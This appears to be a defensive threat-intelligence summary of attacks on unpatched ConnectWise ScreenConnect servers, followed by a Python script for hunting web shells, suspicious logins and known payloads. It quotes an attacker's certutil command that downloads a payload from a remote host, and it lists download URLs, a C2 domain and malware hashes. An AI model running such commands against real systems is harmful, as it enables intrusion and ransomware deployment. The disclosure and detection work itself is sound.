ConnectWise ScreenConnect attacks deliver malware

Sophos observed active exploitation of authentication-bypass and path-traversal vulnerabilities in on-premises ConnectWise ScreenConnect servers, which attackers used to deploy web shells, remote access tools, stealers, and multiple ransomware families. Immediate patching to ScreenConnect 23.9.8+, investigation for implanted web shells or new accounts, and scanning for known IOCs are recommended. #ConnectWiseScreenConnect #LockBit

Keypoints

  • Two critical vulnerabilities (CVE-2024-1709 auth bypass and CVE-2024-1708 path traversal) affect older ScreenConnect server versions and were fixed in 23.9.8; self-hosted instances remain at risk until patched.
  • Proof-of-concept exploit code and widespread exploitation were observed; attackers added accounts, deployed web shells, and pushed malware from compromised servers to many endpoints.
  • Observed payloads delivered via exploited ScreenConnect include LockBit-derived ransomware (identified by a recurring SHA-256), AsyncRAT, Vidar/Redline stealer, Cobalt Strike beacons, Xworm, Rust-based infostealer (Redcap), and custom RATs (e.g., patch3.exe).
  • Attack techniques included using certutil/PowerShell to download payloads, executing installers via msiexec, creating scheduled tasks and registry persistence, and attempting to disable endpoint protection and add Cloudflare Tunnel backdoors.
  • Recommended actions: take vulnerable on-prem servers offline until patched, inspect ScreenConnect\App_Data\User.xml and App_Extensions for new accounts/web shells, scan for temporary/trash files and suspicious downloads, and deploy endpoint/XDR protections and IDS rules.
  • Sophos published XDR queries, detection rule names, and SFOS/EPIPS signatures to help hunting and automated detection of ScreenConnect exploitation and post-exploitation activity.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers exploited unpatched ScreenConnect servers: (‘attacks targeting unpatched ConnectWise ScreenConnect installations’).
  • [T1136] Create Account – Exploit/PoC added new users on compromised systems: (‘PoC code was released on GitHub that exploits these vulnerabilities and adds a new user to the compromised system’).
  • [T1505.003] Web Shell – Attackers implanted web shells in server extensions or other locations for persistent access: (‘Assume that any machines hosting a ScreenConnect server could have one or more implanted web shells’).
  • [T1105] Ingress Tool Transfer – Use of certutil to download payloads from remote servers to disk: (‘certutil -urlcache -f http:///svchost.exe c:\svchost.exe’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Execution of installers and ransomware through msiexec/cmd chains: (‘services.exe -> msiexec.exe -> … crypt64ult.exe’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell invoked to download and run Cobalt Strike beacons and perform reconnaissance: (‘.cmd tried to launch PowerShell to use it to download the beacon’).
  • [T1082] System Information Discovery – Adversaries ran local discovery commands (ipconfig, whoami, get-localuser) to enumerate hosts and accounts: (‘getlocaluser (to obtain a list of local user accounts on the server) and ipconfig’).
  • [T1562] Impair Defenses – Attempts to disable Sophos endpoint protection and modify security controls were observed: (‘they first attempted to disable Sophos endpoint protection’).
  • [T1053] Scheduled Task/Job – Creation of persistent scheduled tasks to download payloads (task named “Windows update”): (‘created a persistent task named “Windows update” that attempted to download a payload from sc.ksfe.workers[.]dev’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Registry edits to enable RDP and persistence modifications were attempted: (‘attempted to make edits to the server’s Windows Registry to enable Remote Desktop Protocol access’).

Indicators of Compromise

  • [File Hash] ransomware sample – SHA-256 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a (LockBit-builder variant), and another payload hash a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0.
  • [File Hash] stealer sample – SHA-256 c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f (Vidar/Redline).
  • [Filenames/Paths] common payload locations – \Windows\Temp\ScreenConnect\23.9.6.8787\upd.exe, \Windows\Temp\ScreenConnect\23.9.6.8787\enc.exe, \users\temp\enc.exe, and C:\svchost.exe (downloaded via certutil).
  • [Filenames] installer/persistent RAT names – patch3.exe (Safe Mode RAT), first.exe (SimpleHelp installer), crypt64ult.exe (ransomware payload), and ScreenConnect.exe/ScreenConnect.ClientService.exe.
  • [Domain/URL] C2 / download hosts – sc.ksfe.workers[.]dev (scheduled-task download), and examples of remote IP-hosted payloads such as http:///svchost.exe and http://:8084/msappdata.msi.
  • [Artifacts] config/log indicators – modifications to ScreenConnect\App_Data\User.xml, presence of .ASPX/.ASHX files in App_Extensions (possible web shells), and temporary user XML files indicating exploit activity.

Attackers exploited two server-side ScreenConnect flaws (CVE-2024-1709 auth bypass and CVE-2024-1708 path traversal) to gain initial access, create accounts, and write webshells or installers into ScreenConnect directories. They used built-in Windows utilities (certutil, msiexec, PowerShell, cmd) to fetch and run payloads from remote hosts; observed payloads included a LockBit-builder ransomware (recurring SHA-256), Vidar/Redline stealer, AsyncRAT, Cobalt Strike beacons, Xworm, Rust-based infostealer (Redcap), and bespoke RATs like patch3.exe which install persistence even in Safe Mode.

Practical remediation and hunting steps: immediately isolate or take offline any on-prem ScreenConnect servers running versions prior to 23.9.8, upgrade to 23.9.8+, and assume compromise until inspected. Investigate ScreenConnect\App_Data\User.xml and App_Extensions for newly created accounts, .ASPX/.ASHX files or web shells; search Temp and ScreenConnect extension folders for enc.exe/upd.exe/first.exe/patch3.exe, check scheduled tasks (e.g., task named “Windows update”), registry Run keys, and evidence of certutil/PowerShell downloads and msiexec installer chains; apply XDR/IDS detections and endpoint protections to block known exploit scripts and payload behaviors.

For detection, query telemetry for ScreenConnect server versions, ScreenConnect relay IPs, IIS logs showing SetupWizard.aspx hits with a trailing slash, shells spawned from ScreenConnect processes, and temporary user file creation timestamps; deploy the provided Sophos XDR queries, enable IDS/EPIPS SIDs (2309339/2309343/2309344), and run offline scans to remove any implanted web shells or unauthorized accounts prior to reconnecting servers to production.
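The hunting steps in the two paragraphs above can be scripted. The following is an added example, not Sophos tooling or a ScreenConnect component: it checks a server version string against the fixed release 23.9.8, scans IIS W3C log text for SetupWizard.aspx requests carrying a trailing slash, and sweeps a directory tree for .aspx/.ashx files under App_Extensions and for files whose SHA-256 matches the hashes listed in the indicator section. The IIS log lines and the directory layout it runs against are constructed here for an offline run; the function names, the sample client IPs and the planted file names are assumptions, not values from the article.

```python
"""Added hunting helpers for the ScreenConnect indicators described on this page."""
import hashlib
import re
import tempfile
from pathlib import Path

FIXED_VERSION = (23, 9, 8)  # first ScreenConnect release with both CVEs fixed

# SHA-256 values copied from the indicator list on this page.
KNOWN_HASHES = {
    "2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a": "LockBit-builder ransomware",
    "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0": "ransomware payload",
    "c94038781c56ab85d2f110db4f45b86ccf269e77a3ff4b9133b96745ff97d25f": "Vidar/Redline stealer",
}
WEBSHELL_SUFFIXES = {".aspx", ".ashx"}
SETUP_WIZARD_SLASH = re.compile(r"/SetupWizard\.aspx/", re.IGNORECASE)


def is_vulnerable_version(version: str) -> bool:
    """True when a ScreenConnect server version string is older than 23.9.8."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    parts += (0,) * (3 - len(parts))  # pad "23.9" to "23.9.0" so tuples compare cleanly
    return parts < FIXED_VERSION


def find_setup_wizard_hits(log_text: str) -> list:
    """Return (client ip, method, uri-stem, status) for SetupWizard.aspx requests
    with a trailing slash. Column positions come from the #Fields: header, so the
    scan works whatever logging fields the IIS site has enabled."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        if SETUP_WIZARD_SLASH.search(stem):
            hits.append((row.get("c-ip"), row.get("cs-method"), stem, row.get("sc-status")))
    return hits


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def sweep_directory(root: Path, known_hashes=KNOWN_HASHES) -> list:
    """Flag .aspx/.ashx files under App_Extensions and any file whose SHA-256 is
    in known_hashes. Returns sorted (reason, path relative to root) tuples."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if "App_Extensions" in path.parts and path.suffix.lower() in WEBSHELL_SUFFIXES:
            findings.append(("possible web shell", rel))
        digest = sha256_of(path)
        if digest in known_hashes:
            findings.append((known_hashes[digest], rel))
    return sorted(findings)


# --- constructed sample data for an offline run (not from a real incident) ---
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2024-02-21 10:15:02 10.0.0.5 GET /Login - 443 198.51.100.23 200
2024-02-21 10:15:09 10.0.0.5 POST /SetupWizard.aspx/ - 443 198.51.100.23 200
2024-02-21 10:16:31 10.0.0.5 GET /SetupWizard.aspx - 443 192.0.2.14 403
"""


def build_sample_tree() -> Path:
    """Create a throwaway ScreenConnect-like layout with one planted .ashx file
    under App_Extensions and one harmless decoy binary; returns the root path."""
    root = Path(tempfile.mkdtemp(prefix="sc_hunt_"))
    planted = root / "App_Extensions" / "0000-constructed" / "Service.ashx"
    planted.parent.mkdir(parents=True)
    planted.write_text("CONSTRUCTED placeholder, not a real handler")
    legit = root / "App_Extensions" / "legit" / "manifest.xml"
    legit.parent.mkdir(parents=True)
    legit.write_text("<Manifest/>")
    decoy = root / "Temp" / "ScreenConnect" / "23.9.6.8787" / "upd.exe"
    decoy.parent.mkdir(parents=True)
    decoy.write_bytes(b"CONSTRUCTED-NOT-MALWARE")
    return root


def run_checks(version: str, log_text: str, root: Path) -> dict:
    """Bundle the three checks into one report dictionary."""
    return {
        "vulnerable_version": is_vulnerable_version(version),
        "setup_wizard_hits": find_setup_wizard_hits(log_text),
        "file_findings": sweep_directory(root),
    }


if __name__ == "__main__":
    for key, value in run_checks("23.9.6.8787", SAMPLE_IIS_LOG, build_sample_tree()).items():
        print(f"{key}: {value}")
```

Run it against a real server by pointing `sweep_directory` at the ScreenConnect installation root and feeding `find_setup_wizard_hits` the contents of the site's IIS log files; a hit on a pre-23.9.8 server is reason enough to treat the host as compromised and keep it off the network until the account list and extension directories have been reviewed.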

Read more: https://news.sophos.com/en-us/2024/02/23/connectwise-screenconnect-attacks-deliver-malware/